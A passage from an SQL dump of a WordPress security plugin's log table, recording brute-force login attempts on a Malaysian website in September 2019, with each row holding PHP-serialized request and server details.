13:10:18',17738976,19231312,'https://bintara.com.my/wp-login.php',1,0,'188.166.158.153'),(24127,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.158.153\";s:11:\"REMOTE_PORT\";s:5:\"50778\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@JwnPgbK7GuRh1kKna-wAAAJE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568639426.7355\";s:12:\"REQUEST_TIME\";s:10:\"1568639426\";}}','notice','2019-09-16 13:10:28','2019-09-16 13:10:27',18255544,19554872,'https://bintara.com.my/xmlrpc.php',1,0,'188.166.158.153'),(24128,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"37.59.14.72\";s:11:\"REMOTE_PORT\";s:5:\"48724\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@MDHPgbK7GuRh1kKncqwAAAJQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568640012.3216\";s:12:\"REQUEST_TIME\";s:10:\"1568640012\";}}','notice','2019-09-16 13:20:13','2019-09-16 13:20:12',17738384,19230080,'https://bintara.com.my/wp-login.php',1,0,'37.59.14.72'),(24129,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"37.59.14.72\";s:11:\"REMOTE_PORT\";s:5:\"49438\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@MDr1rBLb0GV3O7mTjngAAAEc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568640015.0078\";s:12:\"REQUEST_TIME\";s:10:\"1568640015\";}}','notice','2019-09-16 13:20:16','2019-09-16 13:20:15',18253952,19553680,'https://bintara.com.my/xmlrpc.php',1,0,'37.59.14.72'),(24130,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"51.77.64.186\";s:11:\"REMOTE_PORT\";s:5:\"43848\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@MN2f5CPZPc3WLyovG7QAAAMw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568640055.5362\";s:12:\"REQUEST_TIME\";s:10:\"1568640055\";}}','notice','2019-09-16 13:20:56','2019-09-16 13:20:55',17738960,19230688,'https://bintara.com.my/wp-login.php',1,0,'51.77.64.186'),(24131,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"51.77.64.186\";s:11:\"REMOTE_PORT\";s:5:\"44318\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@MOnPgbK7GuRh1kKncuwAAAJE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568640058.2539\";s:12:\"REQUEST_TIME\";s:10:\"1568640058\";}}','notice','2019-09-16 13:20:59','2019-09-16 13:20:58',18256328,19556072,'https://bintara.com.my/xmlrpc.php',1,0,'51.77.64.186'),(24132,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.40.233\";s:11:\"REMOTE_PORT\";s:5:\"49461\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@N4XPgbK7GuRh1kKnd0AAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568640481.4223\";s:12:\"REQUEST_TIME\";s:10:\"1568640481\";}}','notice','2019-09-16 13:28:02','2019-09-16 13:28:01',17738816,19230072,'https://bintara.com.my/wp-login.php',1,0,'139.59.40.233'),(24133,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.40.233\";s:11:\"REMOTE_PORT\";s:5:\"50005\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@N43PgbK7GuRh1kKnd0gAAAJc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568640483.829\";s:12:\"REQUEST_TIME\";s:10:\"1568640483\";}}','notice','2019-09-16 13:28:05','2019-09-16 13:28:04',18255456,19554600,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.40.233'),(24134,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.158.153\";s:11:\"REMOTE_PORT\";s:5:\"40810\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@PPB0uvyt9KRYoKL8WAgAAABA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568640828.6691\";s:12:\"REQUEST_TIME\";s:10:\"1568640828\";}}','notice','2019-09-16 13:33:49','2019-09-16 13:33:49',17738832,19229480,'https://bintara.com.my/wp-login.php',1,0,'188.166.158.153'),(24135,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.158.153\";s:11:\"REMOTE_PORT\";s:5:\"41154\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@PPx0uvyt9KRYoKL8WAwAAABM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568640831.6406\";s:12:\"REQUEST_TIME\";s:10:\"1568640831\";}}','notice','2019-09-16 13:33:52','2019-09-16 